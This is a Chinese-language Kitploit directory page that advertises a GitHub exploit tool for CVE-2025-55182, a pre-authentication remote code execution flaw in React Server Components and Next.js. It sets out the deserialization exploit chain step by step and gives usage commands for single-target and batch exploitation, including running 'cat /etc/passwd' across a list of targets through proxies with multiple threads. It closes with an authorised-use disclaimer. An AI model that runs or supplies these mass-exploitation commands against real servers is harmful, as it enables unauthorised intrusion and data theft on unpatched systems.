Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-55182 — 预认证远程代码执行漏洞利用工具,针对 React Server Components 和 Next.js,通过反序列化漏洞。支持单目标和批量扫描,带有代理和多线程功能。 | Kitploit
工具/GitHubGitHub/luoluoqingge/cve-2025-55182
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试红队远程访问工具
GitHubluoluoqingge/cve-2025-55182

CVE-2025-55182

预认证远程代码执行漏洞利用工具,针对 React Server Components 和 Next.js,通过反序列化漏洞。支持单目标和批量扫描,带有代理和多线程功能。

查看仓库
125个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2025-55182 - React2Shell

React Server Components / Next.js Pre-Authentication Remote Code Execution

属性值
CVE IDCVE-2025-55182
CVSS10.0 (Critical)
CWECWE-502: Deserialization of Untrusted Data
类型Pre-Auth RCE

影响范围

组件受影响版本
React19.0.0, 19.1.0, 19.1.1, 19.2.0
Next.js15.0.0 ~ 15.0.4, 15.1.0 ~ 15.1.8, 15.2.x ~ 15.5.6, 16.0.0 ~ 16.0.6
相关包react-server-dom-webpack, react-server-dom-turbopack, react-server-dom-parcel

漏洞原理

该漏洞利用 React Server Components (RSC) Flight 协议中的反序列化缺陷,通过构造恶意的 multipart/form-data 请求实现未授权远程代码执行。完整利用链如下:

  1. 通过 POST multipart/form-data 配合 Next-Action 请求头触发 Server Action 路径
  2. Chunk "0" 包含精心构造的 JSON 对象(非数组包裹),$1:__proto__:then 访问 PENDING 状态 Chunk 1 对象上的 Chunk.prototype.then,使其成为 thenable
  3. $1:constructor:constructor 通过原型链解析为 Function 构造函数
  4. Chunk.prototype.then 调用 initializeModelChunk 解析 value 字段 '{"then":"$B0"}'
  5. $B0 blob 解析调用 _formData.get(_prefix + "0") 即 Function(code + "0")
  6. 返回的函数对象自身具有 then 属性,被视为 thenable 并被调用,触发代码执行,实现 RCE

依赖安装

root@kitploit:~
pip install requests[socks]

脚本在缺少依赖时会自动尝试安装 requests 和 PySocks。

使用方法

单目标 RCE

root@kitploit:~
python CVE-2025-55182.py -u http://target:3000 -c "id"

批量利用

root@kitploit:~
python CVE-2025-55182.py -f targets.txt -c "cat /etc/passwd" -o results.txt

仅检测漏洞(不执行命令)

root@kitploit:~
python CVE-2025-55182.py -u http://target:3000 --check
python CVE-2025-55182.py -f targets.txt --check -o vuln_hosts.txt

使用代理

root@kitploit:~
# HTTP 代理
python CVE-2025-55182.py -u http://target:3000 -c "whoami" --proxy http://127.0.0.1:8080

# SOCKS5 代理
python CVE-2025-55182.py -f targets.txt -c "id" --proxy socks5://127.0.0.1:1080

调试模式

root@kitploit:~
python CVE-2025-55182.py -u http://target:3000 -c "id" -v

完整参数说明

输出说明

  • VULN — 目标存在漏洞,成功获取命令执行结果
  • MAYBE — 可能存在漏洞(如读取超时)
  • ERR — 连接错误
  • SAFE — 未检测到漏洞

批量扫描结果会写入 -o 指定的输出文件,仅记录确认存在漏洞的目标。

targets.txt 格式示例

root@kitploit:~
http://192.168.1.10:3000
https://app.example.com
http://10.0.0.5:3000/dashboard
# 注释行会被忽略

免责声明

本工具仅用于已授权的安全测试和安全研究目的。使用者必须确保已获得目标系统所有者的明确授权。未经授权对系统进行渗透测试属于违法行为,使用者需自行承担一切法律责任。

下载工具
参数说明默认值
-u, --url单个目标 URL(与 -f 互斥)-
-f, --file目标 URL 列表文件,每行一个(与 -u 互斥)-
-c, --command要执行的系统命令(--check 模式下非必需)-
-o, --output结果输出文件results.txt
-t, --threads并发线程数10
-v, --verbose显示调试输出False
--proxy代理地址,支持 HTTP 和 SOCKS5-
--timeout请求超时时间(秒)15
--check仅检测漏洞,不执行系统命令False
--verify-ssl验证 TLS 证书False